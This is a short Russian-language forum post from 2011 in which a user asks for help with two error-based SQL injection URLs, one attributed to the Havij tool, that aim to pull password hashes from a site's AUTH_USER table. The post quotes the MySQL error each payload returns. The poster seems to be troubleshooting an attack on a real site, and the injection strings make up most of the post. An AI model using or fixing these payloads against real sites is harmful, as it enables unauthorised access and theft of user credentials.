
27.11.2011, 15:46
|
|
Познающий
Регистрация: 30.10.2011
Сообщений: 37
С нами:
7650326
Репутация:
1
|
|
уважаемые знатоки
Доброго дня всем, люди кто нибудь сталкивался с такой ситуацией:
http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and+(select+1+from(se lect+count(*),(select+concat(0x3a,password_md5,0x3 a)+from+AUTH_USER+limit+1,1),floor(rand(0)*2))+hav ing+min(0))+and+'1'='1
Message of provider: SQLSTATE[42000]: Syntax error or access violation: 1248 Every derived table must have its own alias.' in....
или как вариант запрос havij
http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and(select+1+from(sel ect+count(*),concat((select+(select+(select+concat (password_md5)+from+AUTH_USER+limit+0,1))+from+inf ormation_schema.tables+limit+0,1),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)+an d+'1'='1
с ошибкой вида:
Subquery returns more than 1 row.' in
|
|
|